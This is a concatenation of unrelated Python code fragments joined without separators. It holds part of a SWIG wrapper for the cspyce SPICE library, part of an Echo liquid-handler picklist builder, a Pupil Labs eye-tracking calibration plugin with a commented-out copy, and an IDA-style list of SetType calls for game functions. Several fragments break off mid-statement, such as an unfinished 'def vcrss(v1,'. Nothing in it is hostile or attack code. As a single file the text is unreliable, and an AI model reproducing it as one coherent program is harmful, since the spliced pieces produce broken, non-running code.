_cspyce0.tpictr(sample) def trace(matrix): """trace(ConstSpiceDouble [3][3] matrix) -> SpiceDouble""" return _cspyce0.trace(matrix) def trace_vector(in31): """trace_vector(ConstSpiceDouble * in31)""" return _cspyce0.trace_vector(in31) def trcoff(): """trcoff()""" return _cspyce0.trcoff() def trcdep(): """trcdep()""" return _cspyce0.trcdep() def trcnam(index): """trcnam(SpiceInt index)""" return _cspyce0.trcnam(index) def tsetyr(year): """tsetyr(SpiceInt year)""" return _cspyce0.tsetyr(year) def twopi(): """twopi() -> SpiceDouble""" return _cspyce0.twopi() def twovec(axdef, indexa, plndef, indexp): """twovec(ConstSpiceDouble [3] axdef, SpiceInt indexa, ConstSpiceDouble [3] plndef, SpiceInt indexp)""" return _cspyce0.twovec(axdef, indexa, plndef, indexp) def twovec_vector(in21, k1, in22, k2): """twovec_vector(ConstSpiceDouble * in21, SpiceInt k1, ConstSpiceDouble * in22, SpiceInt k2)""" return _cspyce0.twovec_vector(in21, k1, in22, k2) def tyear(): """tyear() -> SpiceDouble""" return _cspyce0.tyear() def ucrss(v1, v2): """ucrss(ConstSpiceDouble [3] v1, ConstSpiceDouble [3] v2)""" return _cspyce0.ucrss(v1, v2) def ucrss_vector(in21, in22): """ucrss_vector(ConstSpiceDouble * in21, ConstSpiceDouble * in22)""" return _cspyce0.ucrss_vector(in21, in22) def unitim(epoch, arg2, arg3): """unitim(SpiceDouble epoch, ConstSpiceChar * arg2, ConstSpiceChar * arg3) -> SpiceDouble""" return _cspyce0.unitim(epoch, arg2, arg3) def unitim_vector(in11, str1, str2): """unitim_vector(ConstSpiceDouble * in11, ConstSpiceChar * str1, ConstSpiceChar * str2)""" return _cspyce0.unitim_vector(in11, str1, str2) def unload(CONST_STRING): """unload(ConstSpiceChar * CONST_STRING)""" return _cspyce0.unload(CONST_STRING) def unorm(v1): """unorm(ConstSpiceDouble [3] v1)""" return _cspyce0.unorm(v1) def unorm_vector(in21): """unorm_vector(ConstSpiceDouble * in21)""" return _cspyce0.unorm_vector(in21) def unormg(v1): """unormg(ConstSpiceDouble * v1)""" return _cspyce0.unormg(v1) def my_unormg_nomalloc(v1, v2, nd2): """my_unormg_nomalloc(ConstSpiceDouble * v1, SpiceDouble * v2, int * nd2)""" return _cspyce0.my_unormg_nomalloc(v1, v2, nd2) def unormg_vector(in21): """unormg_vector(ConstSpiceDouble * in21)""" return _cspyce0.unormg_vector(in21) def utc2et(CONST_STRING): """utc2et(ConstSpiceChar * CONST_STRING)""" return _cspyce0.utc2et(CONST_STRING) def vadd(v1, v2): """vadd(ConstSpiceDouble [3] v1, ConstSpiceDouble [3] v2)""" return _cspyce0.vadd(v1, v2) def vadd_vector(in21, in22): """vadd_vector(ConstSpiceDouble * in21, ConstSpiceDouble * in22)""" return _cspyce0.vadd_vector(in21, in22) def vaddg(v1, v2): """vaddg(ConstSpiceDouble * v1, ConstSpiceDouble * v2)""" return _cspyce0.vaddg(v1, v2) def my_vaddg_nomalloc(v1, v2, v3, nd3): """my_vaddg_nomalloc(ConstSpiceDouble * v1, ConstSpiceDouble * v2, SpiceDouble * v3, int * nd3)""" return _cspyce0.my_vaddg_nomalloc(v1, v2, v3, nd3) def vaddg_vector(in21, in22): """vaddg_vector(ConstSpiceDouble * in21, ConstSpiceDouble * in22)""" return _cspyce0.vaddg_vector(in21, in22) def vcrss(v1,
to the master mix manually, i.e., self.master_mix.append(material) after whatever check is required to avoid duplications. Returns 0 if the material was added successfully; returns 1 if an identical material was already in this EchoRun object's material list, so the new material was not added. ''' if material.name in self.material_dict.keys(): prior_mat = self.material_dict[material.name] if prior_mat.name == material.name \ and prior_mat.concentration == material.concentration \ and prior_mat.length == material.length \ and prior_mat.plate == material.plate: return 1 else: raise ValueError("Tried to add material " + material.name + \ " with concentration " + str(material.concentration) + \ ", length " + str(material.length) + ", and plate " + \ str(material.plate) + "; that material already exists " + \ "with concentration " + str(prior_mat.concentration) + \ ", length " + str(prior_mat.length) + ", and plate " + \ str(prior_mat.plate) + ".") else: self.material_dict[material.name] = material material.plate = self.plates[0] return 0 def build_picklist_from_txtl_setup_excel(self, input_filename): ''' CURRENTLY NONFUNCTIONAL DO NOT USE Build an Echo picklist based on a TX-TL setup spreadsheet (v2.1 or newer). ''' raise NotImplementedError("'build_picklist_from_txtl_setup_excel' " + \ "hasn't been implemented yet. Use " + \ "'build_picklist_from_txtl_setup_csvs'.") # Open the workbook and identify all the important sheets # workbook = pyxl.load_workbook(input_filename) # recipe_sheet = None # stock_sheet = None # layout_sheet = None # for sheet in workbook: # if sheet.title == "Recipe": # recipe = sheet # elif sheet.title == "Stocks": # stocks = sheet # elif sheet.title == "Layout": # layout = sheet def build_picklist_from_txtl_setup_csvs(self, stock_filename, recipe_filename): ''' Build an Echo picklist based on a pair of CSV documents produced from a TX-TL setup spreadsheet (v2.1). The stock sheet is a CSV describing materials on the source plate (plasmids, usually). The recipe sheet is a CSV describing the master mix and what materials from the stock sheet go in what destination wells, in what quantity. This function will overwrite any previous master mix defined for this EchoRun object, since the master mix is fully defined in the recipe sheet. ''' self.make_master_mix = True #################### # Read Input Files # #################### # Read in stock file stock_sheet = np.empty(shape = (12,5), dtype = object) with mt_open(stock_filename, 'rU') as stock_file: stock_reader = csv.reader(stock_file) rownum = -1 for row in stock_reader: rownum += 1 for colnum in range(len(row)): element = floatify(row[colnum]) stock_sheet[rownum, colnum] = element # Read in recipe file recipe_sheet = np.zeros(shape = (384+20, 16), dtype = object) with mt_open(recipe_filename, 'rU') as recipe_file: recipe_reader = csv.reader(recipe_file) rownum = -1 for row in recipe_reader: rownum += 1 if rownum >= recipe_sheet.shape[0]: print("Warning -- You are trying to add to more than " + \ "384 wells in the destination plate. " + \ "Extra wells will be clipped.") break for colnum in range(len(row)): element = floatify(row[colnum]) if element: recipe_sheet[rownum, colnum] = element # Set some magic numbers based on the recipe file self.rxn_vol = float(recipe_sheet[11,10]) * 1e3 self.extract_fraction = float(recipe_sheet[12,2]) self.buffer_fraction = 0.75 - self.extract_fraction self.mm_excess = float(recipe_sheet[11,12]) ###################### # Register Materials # ###################### # Magic numbers here are spreadsheet positions of volumes to add. material_total_vols = [0]*10 for i in range(len(material_total_vols)): for j in range(20,recipe_sheet.shape[0]): if recipe_sheet[j, 5+i]: material_total_vols[i] += recipe_sheet[j, 5+i] * 1e3 # Assign source wells and register materials # Register TX-TL master mix if not "txtl_mm" in self.material_dict: self.material_dict['txtl_mm'] = MasterMix(self.plates[0], extract_fraction = self.extract_fraction, mm_excess = self.mm_excess, add_txtl = False, rxn_vol = self.rxn_vol) txtl = self.material_dict["txtl_mm"] # Register Water self.add_material(EchoSourceMaterial("water", 1, 0, self.plates[0])) water = self.material_dict["water"] # Register other materials stocks = [] for i in range(len(material_total_vols)): if stock_sheet[i+2,1] == "": for j in range(i+1, len(material_total_vols)): if stock_sheet[i+2,1] != "": raise RuntimeWarning("You left a blank row in your " + \ "stock file. This will cause alignment shifts in "+\ "your recipe sheet and you will almost surely " + \ "use the wrong amounts of ingredients. Are you " + \ "sure this is what you want?") continue material_name = stock_sheet[i+2, 1] if isinstance(material_name, float): continue material_concentration = stock_sheet[i+2, 2] material_length = stock_sheet[i+2, 3] new_material = EchoSourceMaterial(material_name, material_concentration, material_length, self.plates[0]) is_duplicate_material = self.add_material(new_material) if not is_duplicate_material: stocks.append(new_material) ################## # Register picks # ################## first_row = 20 last_row = 20 + 384 n_rxns = 0 for rownum in range(first_row, last_row): # Check to see if there's a well used in this row; if not, skip it. if recipe_sheet[rownum, 1] == 0: continue n_rxns += 1 well = recipe_sheet[rownum, 1] if well == 0: raise ValueError(("Error on row for ID #%d of recipe sheet: " +\ "Must have a destination well.") % \ (rownum - 21)) if well in self.reactions.keys(): raise ValueError("Well %s already has a reaction!" \ % well) self.reactions[well] = WellReaction(self.rxn_vol, well) # Material picks (magic number warning -- magic numbers define # positions of relevant blocks in the recipe sheet) for mat_num in range(len(material_total_vols)): colnum = mat_num + 5 volume = recipe_sheet[rownum, colnum] * 1e3 if volume != None and volume > 0: source_material = stocks[mat_num] self.reactions[well].add_volume_of_material(source_material, volume) # Water picks (magic number warning -- magic number defines # positions of relevant blocks in the recipe sheet) volume = recipe_sheet[rownum, 3] * 1e3 self.reactions[well].fill_with(water) # Master Mix picks (magic number warning -- magic number defines # positions of relevant blocks in the recipe sheet) volume = recipe_sheet[rownum, 4] * 1e3 self.reactions[well].add_volume_of_material(txtl, volume) # Add materials to the master mix. for i in range(11,17): if recipe_sheet[i,4] == None or recipe_sheet[i,4] == 0: continue name = recipe_sheet[i,0] stock = recipe_sheet[i,1] final = recipe_sheet[i,2] material = EchoSourceMaterial(name, stock, 0, self.plates[0]) txtl.add_material(material, final) def load_source_plate(self, input_filename, name_col, conc_col, len_col, well_col, plate_col, header = True): ''' Enter new materials from a CSV spreadsheet. Args: input_filename -- name of the CSV. name_col -- Name of the column containing the name of each material, either as a string ("C") or a 0-indexed int (2) conc_col -- Name of the column containing the concentration of each material, in ng/uL if the material is dsDNA or in nM or relative concentration otherwise, either as a string ("C") or a 0-indexed int (2) len_col -- Name of the column containing the length of any dsDNA material, either as a string ("C") or a 0-indexed int (2), or None if no such column exists (for sheets containing only non-dsDNA materials) well_col -- Name of the column containing the well location of each material, either as a string ("C") or a 0-indexed int (2) plate_col -- Name of the column containing the name of the plate the material can be found on, either as a string ("C") or a 0-indexed int (2), or None if no such column exists. Plate will default to Plate[#], where # will increment with each source plate file (without a plate_col) loaded. header -- True iff there is a header row. Decides whether or not to skip the first line of each file ''' ##################### # Process arguments # ##################### name_idx = process_column_argument(name_col) conc_idx = process_column_argument(conc_col) len_idx = process_column_argument(len_col) well_idx = process_column_argument(well_col) plate_idx = process_column_argument(plate_col) ############# # Read file # ############# with mt_open(input_filename, 'rU') as input_file: reader = csv.reader(input_file) # Skip first row if it's a header if header: next(reader) for row in reader: name = row[name_idx] concentration = floatify(row[conc_idx]) well = row[well_idx] if len_idx != None: length = int(floatify(row[len_idx])) else: length = 0 if plate_idx == None: plate_name = "1" else: plate_name = row[plate_idx] plate = None for p in self.plates: if p.name == plate_name: plate = p break if not plate: plate = SourcePlate(SPname = plate_name) material = EchoSourceMaterial(name, concentration, length, plate) self.add_material(material) if self.material_dict[name].wells == None: self.material_dict[name].wells = [well] else: self.material_dict[name].wells.append(well) def build_picklist_from_association_spreadsheet(self, input_filename, well_column, header = True, fill_with_water = False, water_name = None): ''' Make an Echo picklist based on an association spreadsheet, which is a CSV file where 1) each line is a reaction and 2) lines contains alternating columns of material
# -*- coding: utf-8 -*- """ Created on Tue Feb 25 17:36:52 2020 @author: bankslabHP """ """ (*)~--------------------------------------------------------------------------- Pupil - eye tracking platform Copyright (C) 2012-2020 Pupil Labs Distributed under the terms of the GNU Lesser General Public License (LGPL v3.0). See COPYING and COPYING.LESSER for license details. ---------------------------------------------------------------------------~(*) """ import cv2 import numpy as np from pyglui.cygl.utils import draw_points_norm, draw_polyline, RGBA from OpenGL.GL import GL_POLYGON from circle_detector import CircleTracker from calibration_routines.finish_calibration import finish_calibration import audio import os from pyglui import ui #from .calibration_plugin_base import Calibration_Plugin from calibration_routines.calibration_plugin_base import Calibration_Plugin from video_capture.realsense2_backend import Realsense2_Source # logging import logging logger = logging.getLogger(__name__) class My_Manual_Marker_Calibration(Calibration_Plugin): """ CircleTracker looks for proper markers Using at least 9 positions/points within the FOV Ref detector will direct one to good positions with audio cues Calibration only collects data at the good positions """ def __init__(self, g_pool): super().__init__(g_pool) self.pos = None self.smooth_pos = 0.0, 0.0 self.smooth_vel = 0.0 self.sample_site = (-2, -2) self.counter = 0 self.counter_max = 30 self.stop_marker_found = False self.auto_stop = 0 self.auto_stop_max = 30 self.menu = None self.ts_file = None self.ts_filename = [] self.circle_tracker = CircleTracker() self.markers = [] self.base_dir = [] #self.base_dir = '~/Desktop/agos_3d_calibration' def init_ui(self): super().init_ui() self.menu.label = "Manual Calibration" self.menu.append( ui.Info_Text("Calibrate gaze parameters using a handheld marker.") ) def start(self): super().start() audio.say("Starting {}".format(self.mode_pretty)) logger.info("Startingo {}".format(self.mode_pretty)) self.active = True self.ref_list = [] self.pupil_list = [] self.ts_filename = os.path.join(self.base_dir, f"marker_center.csv") print('BASE DIR: ' + self.ts_filename) self.ts_file = open(self.ts_filename,'a+') def stop(self): audio.say("Stopping {}".format(self.mode_pretty)) logger.info("Stoppingo {}".format(self.mode_pretty)) self.ts_file.close() self.screen_marker_state = 0 self.active = False self.smooth_pos = 0.0, 0.0 # self.close_window() self.button.status_text = "" if self.mode == "calibration": finish_calibration(self.g_pool, self.pupil_list, self.ref_list) elif self.mode == "accuracy_test": self.finish_accuracy_test(self.pupil_list, self.ref_list) super().stop() with open(self.ts_filename, 'a+') as self.ts_file: self.ts_file.close() def on_notify(self, notification): if notification.get("subject") == 'recording.started': self.base_dir = os.path.join(notification.get("rec_path"),'3d_calibration') os.makedirs(self.base_dir) """ Reacts to notifications: ``calibration.should_start``: Starts the calibration procedure ``calibration.should_stop``: Stops the calibration procedure Emits notifications: ``calibration.started``: Calibration procedure started ``calibration.stopped``: Calibration procedure stopped ``calibration.marker_found``: Steady marker found ``calibration.marker_moved_too_quickly``: Marker moved too quickly ``calibration.marker_sample_completed``: Enough data points sampled """ super().on_notify(notification) def recent_events(self, events): """ gets called once every frame. reference positon need to be published to shared_pos if no reference was found, publish 0,0 """ frame = events.get("frame") if self.active and frame: gray_img = frame.gray time_frame = self.g_pool.get_timestamp() # Update the marker self.markers = self.circle_tracker.update(gray_img) self.stop_marker_found = False if len(self.markers): # Set the pos to be the center of the first detected marker marker_pos = self.markers[0]["img_pos"] e = self.markers[0]["ellipses"] self.pos = self.markers[0]["norm_pos"] with open(self.ts_filename, 'a+') as self.ts_file: self.ts_file.write(str(time_frame) + ",") #self.ts_file.write(str(marker_pos[0]) + ',' + str(marker_pos[1]) + "\n") self.ts_file.write(str(e[0][0][0]) + ',' + str(e[0][0][1]) + ',' + str(e[1][1][0]) + ',' + str(e[1][1][1]) + ',' + str(e[0][2]) + "\n") #self.ts_file.write(str(e[0]) + "\n") # Check if there are stop markers for marker in self.markers: if marker["marker_type"] == "Stop": self.auto_stop += 1 self.stop_marker_found = True break else: self.pos = None # indicate that no reference is detected if self.stop_marker_found is False: self.auto_stop = 0 # Check if there are more than one markers if len(self.markers) > 1: audio.tink() logger.warning( "{} markers detected. Please remove all the other markers".format( len(self.markers) ) ) # tracking logic if len(self.markers) and not self.stop_marker_found: # start counter if ref is resting in place and not at last sample site # calculate smoothed manhattan velocity smoother = 0.3 smooth_pos = np.array(self.smooth_pos) pos = np.array(self.pos) new_smooth_pos = smooth_pos + smoother * (pos - smooth_pos) smooth_vel_vec = new_smooth_pos - smooth_pos smooth_pos = new_smooth_pos self.smooth_pos = list(smooth_pos) # manhattan distance for velocity new_vel = abs(smooth_vel_vec[0]) + abs(smooth_vel_vec[1]) self.smooth_vel = self.smooth_vel + smoother * ( new_vel - self.smooth_vel ) # distance to last sampled site sample_ref_dist = smooth_pos - np.array(self.sample_site) sample_ref_dist = abs(sample_ref_dist[0]) + abs(sample_ref_dist[1]) # start counter if ref is resting in place and not at last sample site if self.counter <= 0: if self.smooth_vel < 0.01 and sample_ref_dist > 0.1: self.sample_site = self.smooth_pos audio.beep() logger.debug( "Steady marker found. Starting to sample {} datapoints".format( self.counter_max ) ) self.notify_all( { "subject": "calibration.marker_found", "timestamp": self.g_pool.get_timestamp(), "record": True, } ) self.counter = self.counter_max if self.counter > 0: if self.smooth_vel > 0.01: audio.tink() logger.warning( "Marker moved too quickly: Aborted sample. Sampled {} datapoints. Looking for steady marker again.".format( self.counter_max - self.counter ) ) self.notify_all( { "subject": "calibration.marker_moved_too_quickly", "timestamp": self.g_pool.get_timestamp(), "record": True, } ) self.counter = 0 else: self.counter -= 1 ref = {} ref["norm_pos"] = self.pos ref["screen_pos"] = marker_pos ref["timestamp"] = frame.timestamp self.ref_list.append(ref) if self.counter <= 0: # last sample before counter done and moving on audio.tink() logger.debug( "Sampled {} datapoints. Stopping to sample. Looking for steady marker again.".format( self.counter_max ) ) self.notify_all( { "subject": "calibration.marker_sample_completed", "timestamp": self.g_pool.get_timestamp(), "record": True, } ) # Always save pupil positions self.pupil_list.extend(events["pupil"]) if self.counter: if len(self.markers): self.button.status_text = "Sampling Gaze Data" else: self.button.status_text = "Marker Lost" else: self.button.status_text = "Looking for Marker" # Stop if autostop condition is satisfied: if self.auto_stop >= self.auto_stop_max: self.auto_stop = 0 self.stop() else: pass def gl_display(self): """ use gl calls to render at least: the published position of the reference better: show the detected postion even if not published """ if self.active: draw_points_norm([self.smooth_pos], size=15, color=RGBA(1.0, 1.0, 0.0, 0.5)) if self.active and len(self.markers): # draw the largest ellipse of all detected markers for marker in self.markers: e = marker["ellipses"][-1] pts = cv2.ellipse2Poly( (int(e[0][0]), int(e[0][1])), (int(e[1][0] / 2), int(e[1][1] / 2)), int(e[-1]), 0, 360, 15, ) draw_polyline(pts, color=RGBA(0.0, 1.0, 0, 1.0)) if len(self.markers) > 1: draw_polyline( pts, 1, RGBA(1.0, 0.0, 0.0, 0.5), line_type=GL_POLYGON ) # draw indicator on the first detected marker if self.counter and self.markers[0]["marker_type"] == "Ref": e = self.markers[0]["ellipses"][-1] pts = cv2.ellipse2Poly( (int(e[0][0]), int(e[0][1])), (int(e[1][0] / 2), int(e[1][1] / 2)), int(e[-1]), 0, 360, 360 // self.counter_max, ) indicator = [e[0]] + pts[self.counter :].tolist()[::-1] + [e[0]] draw_polyline( indicator, color=RGBA(0.1, 0.5, 0.7, 0.8), line_type=GL_POLYGON ) # draw indicator on the stop marker(s) if self.auto_stop: for marker in self.markers: if marker["marker_type"] == "Stop": e = marker["ellipses"][-1] pts = cv2.ellipse2Poly( (int(e[0][0]), int(e[0][1])), (int(e[1][0] / 2), int(e[1][1] / 2)), int(e[-1]), 0, 360, 360 // self.auto_stop_max, ) indicator = [e[0]] + pts[self.auto_stop :].tolist() + [e[0]] draw_polyline( indicator, color=RGBA(8.0, 0.1, 0.1, 0.8), line_type=GL_POLYGON, ) else: pass def deinit_ui(self): """gets called when the plugin get terminated. This happens either voluntarily or forced. if you have an atb bar or glfw window destroy it here. """ if self.active: self.stop() super().deinit_ui() # # -*- coding: utf-8 -*- # """ # Created on Tue Feb 25 17:36:52 2020 # # @author: bankslabHP # """ # # """ # (*)~--------------------------------------------------------------------------- # Pupil - eye tracking platform # Copyright (C) 2012-2020 Pupil Labs # Distributed under the terms of the GNU # Lesser General Public License (LGPL v3.0). # See COPYING and COPYING.LESSER for license details. # ---------------------------------------------------------------------------~(*) # """ # # import cv2 # import numpy as np # from pyglui.cygl.utils import draw_points_norm, draw_polyline, RGBA # from OpenGL.GL import GL_POLYGON # from circle_detector import CircleTracker # from calibration_routines.finish_calibration import finish_calibration # # import audio # # import os # # from pyglui import ui # #from .calibration_plugin_base import Calibration_Plugin # # from calibration_routines.calibration_plugin_base import Calibration_Plugin # from video_capture.realsense2_backend import Realsense2_Source # # # logging # import logging # # logger = logging.getLogger(__name__) # # # class My_Manual_Marker_Calibration(Calibration_Plugin): # """ # CircleTracker looks for proper markers # Using at least 9 positions/points within the FOV # Ref detector will direct one to good positions with audio cues # Calibration only collects data at the good positions # """ # # def __init__(self, g_pool): # super().__init__(g_pool) # self.pos = None # self.smooth_pos = 0.0, 0.0 # self.smooth_vel = 0.0 # self.sample_site = (-2, -2) # self.counter = 0 # self.counter_max = 30 # # self.stop_marker_found = False # self.auto_stop = 0 # self.auto_stop_max = 30 # # self.menu = None # self.ts_file = None # self.ts_filename = [] # # self.circle_tracker = CircleTracker() # self.markers = [] # # self.base_dir = [] # #self.base_dir = '~/Desktop/agos_3d_calibration' # # def init_ui(self): # super().init_ui() # self.menu.label = "Manual Calibration" # self.menu.append( # ui.Info_Text("Calibrate gaze parameters using a handheld marker.") # ) # # def start(self): # super().start() # audio.say("Starting {}".format(self.mode_pretty)) # logger.info("Startingo {}".format(self.mode_pretty)) # self.active = True # self.ref_list = [] # self.pupil_list = [] # self.ts_filename = os.path.join(self.base_dir, f"marker_center.csv") # print('BASE DIR: ' + self.ts_filename) # self.ts_file = open(self.ts_filename,'a+') # # # # def stop(self): # audio.say("Stopping {}".format(self.mode_pretty)) # logger.info("Stoppingo {}".format(self.mode_pretty)) # self.ts_file.close() # self.screen_marker_state = 0 # self.active = False # self.smooth_pos = 0.0, 0.0 # # self.close_window() # self.button.status_text = "" # if self.mode == "calibration": # finish_calibration(self.g_pool, self.pupil_list, self.ref_list) # elif self.mode == "accuracy_test": # self.finish_accuracy_test(self.pupil_list, self.ref_list) # super().stop() # with open(self.ts_filename, 'a+') as self.ts_file: # self.ts_file.close() # # def on_notify(self, notification): # # if notification.get("subject") == 'recording.started': # self.base_dir = os.path.join(notification.get("rec_path"),'3d_calibration') #
<gh_stars>10-100 del_items(0x801384E4) SetType(0x801384E4, "void GameOnlyTestRoutine__Fv()") del_items(0x801384EC) SetType(0x801384EC, "int vecleny__Fii(int a, int b)") del_items(0x80138510) SetType(0x80138510, "int veclenx__Fii(int a, int b)") del_items(0x8013853C) SetType(0x8013853C, "void GetDamageAmt__FiPiT1(int i, int *mind, int *maxd)") del_items(0x80138B34) SetType(0x80138B34, "int CheckBlock__Fiiii(int fx, int fy, int tx, int ty)") del_items(0x80138C1C) SetType(0x80138C1C, "int FindClosest__Fiii(int sx, int sy, int rad)") del_items(0x80138DB8) SetType(0x80138DB8, "int GetSpellLevel__Fii(int id, int sn)") del_items(0x80138E2C) SetType(0x80138E2C, "int GetDirection8__Fiiii(int x1, int y1, int x2, int y2)") del_items(0x80139048) SetType(0x80139048, "int GetDirection16__Fiiii(int x1, int y1, int x2, int y2)") del_items(0x80139264) SetType(0x80139264, "void DeleteMissile__Fii(int mi, int i)") del_items(0x801392BC) SetType(0x801392BC, "void GetMissileVel__Fiiiiii(int i, int sx, int sy, int dx, int dy, int v)") del_items(0x80139470) SetType(0x80139470, "void PutMissile__Fi(int i)") del_items(0x80139574) SetType(0x80139574, "void GetMissilePos__Fi(int i)") del_items(0x8013969C) SetType(0x8013969C, "void MoveMissilePos__Fi(int i)") del_items(0x80139804) SetType(0x80139804, "unsigned char MonsterTrapHit__FiiiiiUc(int m, int mindam, int maxdam, int dist, int t, int shift)") del_items(0x80139B78) SetType(0x80139B78, "unsigned char MonsterMHit__FiiiiiiUc(int pnum, int m, int mindam, int maxdam, int dist, int t, int shift)") del_items(0x8013A2D8) SetType(0x8013A2D8, "unsigned char PlayerMHit__FiiiiiiUcUc(int pnum, int m, int dist, int mind, int maxd, int mtype, int shift, int earflag)") del_items(0x8013AD44) SetType(0x8013AD44, "unsigned char Plr2PlrMHit__FiiiiiiUc(int pnum, int p, int mindam, int maxdam, int dist, int mtype, int shift)") del_items(0x8013B520) SetType(0x8013B520, "void CheckMissileCol__FiiiUciiUc(int i, int mindam, int maxdam, unsigned char shift, int mx, int my, int nodel)") del_items(0x8013B99C) SetType(0x8013B99C, "unsigned char GetTableValue__FUci(unsigned char code, int dir)") del_items(0x8013BA30) SetType(0x8013BA30, "void SetMissAnim__Fii(int mi, int animtype)") del_items(0x8013BB00) SetType(0x8013BB00, "void SetMissDir__Fii(int mi, int dir)") del_items(0x8013BB44) SetType(0x8013BB44, "void AddLArrow__Fiiiiiicii(int mi, int sx, int sy, int dx, int dy, int midir, int mienemy, int id, int dam)") del_items(0x8013BD24) SetType(0x8013BD24, "void AddArrow__Fiiiiiicii(int mi, int sx, int sy, int dx, int dy, int midir, int mienemy, int id, int dam)") del_items(0x8013BEE0) SetType(0x8013BEE0, "void GetVileMissPos__Fiii(int mi, int dx, int dy)") del_items(0x8013C004) SetType(0x8013C004, "void AddRndTeleport__Fiiiiiicii(int mi, int sx, int sy, int dx, int dy, int midir, int mienemy, int id, int dam)") del_items(0x8013C374) SetType(0x8013C374, "void AddFirebolt__Fiiiiiicii(int mi, int sx, int sy, int dx, int dy, int midir, int micaster, int id, int dam)") del_items(0x8013C5E0) SetType(0x8013C5E0, "void AddMagmaball__Fiiiiiicii(int mi, int sx, int sy, int dx, int dy, int midir, int mienemy, int id, int dam)") del_items(0x8013C6F4) SetType(0x8013C6F4, "void AddTeleport__Fiiiiiicii(int mi, int sx, int sy, int dx, int dy, int midir, int mienemy, int id, int dam)") del_items(0x8013C8EC) SetType(0x8013C8EC, "void AddLightball__Fiiiiiicii(int mi, int sx, int sy, int dx, int dy, int midir, int mienemy, int id, int dam)") del_items(0x8013CA40) SetType(0x8013CA40, "void AddFirewall__Fiiiiiicii(int mi, int sx, int sy, int dx, int dy, int midir, int mienemy, int id, int dam)") del_items(0x8013CC28) SetType(0x8013CC28, "void AddFireball__Fiiiiiicii(int mi, int sx, int sy, int dx, int dy, int midir, int mienemy, int id, int dam)") del_items(0x8013CE84) SetType(0x8013CE84, "void AddLightctrl__Fiiiiiicii(int mi, int sx, int sy, int dx, int dy, int midir, int mienemy, int id, int dam)") del_items(0x8013CF6C) SetType(0x8013CF6C, "void AddLightning__Fiiiiiicii(int mi, int sx, int sy, int dx, int dy, int midir, int mienemy, int id, int dam)") del_items(0x8013D134) SetType(0x8013D134, "void AddMisexp__Fiiiiiicii(int mi, int sx, int sy, int dx, int dy, int midir, int mienemy, int id, int dam)") del_items(0x8013D340) SetType(0x8013D340, "unsigned char CheckIfTrig__Fii(int x, int y)") del_items(0x8013D424) SetType(0x8013D424, "void AddTown__Fiiiiiicii(int mi, int sx, int sy, int dx, int dy, int midir, int mienemy, int id, int dam)") del_items(0x8013D848) SetType(0x8013D848, "void AddFlash__Fiiiiiicii(int mi, int sx, int sy, int dx, int dy, int midir, int mienemy, int id, int dam)") del_items(0x8013DA58) SetType(0x8013DA58, "void AddFlash2__Fiiiiiicii(int mi, int sx, int sy, int dx, int dy, int midir, int mienemy, int id, int dam)") del_items(0x8013DC38) SetType(0x8013DC38, "void AddManashield__Fiiiiiicii(int mi, int sx, int sy, int dx, int dy, int midir, int mienemy, int id, int dam)") del_items(0x8013DD00) SetType(0x8013DD00, "void AddFiremove__Fiiiiiicii(int mi, int sx, int sy, int dx, int dy, int midir, int mienemy, int id, int dam)") del_items(0x8013DE5C) SetType(0x8013DE5C, "void AddGuardian__Fiiiiiicii(int mi, int sx, int sy, int dx, int dy, int midir, int mienemy, int id, int dam)") del_items(0x8013E2C8) SetType(0x8013E2C8, "void AddChain__Fiiiiiicii(int mi, int sx, int sy, int dx, int dy, int midir, int mienemy, int id, int dam)") del_items(0x8013E324) SetType(0x8013E324, "void AddRhino__Fiiiiiicii(int mi, int sx, int sy, int dx, int dy, int midir, int mienemy, int id, int dam)") del_items(0x8013E4E0) SetType(0x8013E4E0, "void AddFlare__Fiiiiiicii(int mi, int sx, int sy, int dx, int dy, int midir, int mienemy, int id, int dam)") del_items(0x8013E7D8) SetType(0x8013E7D8, "void AddAcid__Fiiiiiicii(int mi, int sx, int sy, int dx, int dy, int midir, int mienemy, int id, int dam)") del_items(0x8013E8DC) SetType(0x8013E8DC, "void AddAcidpud__Fiiiiiicii(int mi, int sx, int sy, int dx, int dy, int midir, int mienemy, int id, int dam)") del_items(0x8013E9B4) SetType(0x8013E9B4, "void AddStone__Fiiiiiicii(int mi, int sx, int sy, int dx, int dy, int midir, int mienemy, int id, int dam)") del_items(0x8013ECAC) SetType(0x8013ECAC, "void AddGolem__Fiiiiiicii(int mi, int sx, int sy, int dx, int dy, int midir, int mienemy, int id, int dam)") del_items(0x8013EE64) SetType(0x8013EE64, "void AddBoom__Fiiiiiicii(int mi, int sx, int sy, int dx, int dy, int midir, int mienemy, int id, int dam)") del_items(0x8013EEF8) SetType(0x8013EEF8, "void AddHeal__Fiiiiiicii(int mi, int sx, int sy, int dx, int dy, int midir, int mienemy, int id, int dam)") del_items(0x8013F120) SetType(0x8013F120, "void AddHealOther__Fiiiiiicii(int mi, int sx, int sy, int dx, int dy, int midir, int mienemy, int id, int dam)") del_items(0x8013F188) SetType(0x8013F188, "void AddElement__Fiiiiiicii(int mi, int sx, int sy, int dx, int dy, int midir, int mienemy, int id, int dam)") del_items(0x8013F3B4) SetType(0x8013F3B4, "void AddIdentify__Fiiiiiicii(int mi, int sx, int sy, int dx, int dy, int midir, int mienemy, int id, int dam)") del_items(0x8013F464) SetType(0x8013F464, "void AddFirewallC__Fiiiiiicii(int mi, int sx, int sy, int dx, int dy, int midir, int mienemy, int id, int dam)") del_items(0x8013F714) SetType(0x8013F714, "void AddInfra__Fiiiiiicii(int mi, int sx, int sy, int dx, int dy, int midir, int mienemy, int id, int dam)") del_items(0x8013F810) SetType(0x8013F810, "void AddWave__Fiiiiiicii(int mi, int sx, int sy, int dx, int dy, int midir, int mienemy, int id, int dam)") del_items(0x8013F894) SetType(0x8013F894, "void AddNova__Fiiiiiicii(int mi, int sx, int sy, int dx, int dy, int midir, int mienemy, int id, int dam)") del_items(0x8013FAAC) SetType(0x8013FAAC, "void AddRepair__Fiiiiiicii(int mi, int sx, int sy, int dx, int dy, int midir, int mienemy, int id, int dam)") del_items(0x8013FB5C) SetType(0x8013FB5C, "void AddRecharge__Fiiiiiicii(int mi, int sx, int sy, int dx, int dy, int midir, int mienemy, int id, int dam)") del_items(0x8013FC0C) SetType(0x8013FC0C, "void AddDisarm__Fiiiiiicii(int mi, int sx, int sy, int dx, int dy, int midir, int mienemy, int id, int dam)") del_items(0x8013FC74) SetType(0x8013FC74, "void AddApoca__Fiiiiiicii(int mi, int sx, int sy, int dx, int dy, int midir, int mienemy, int id, int dam)") del_items(0x8013FEB0) SetType(0x8013FEB0, "void AddFlame__Fiiiiiicii(int mi, int sx, int sy, int dx, int dy, int midir, int mienemy, int id, int seqno)") 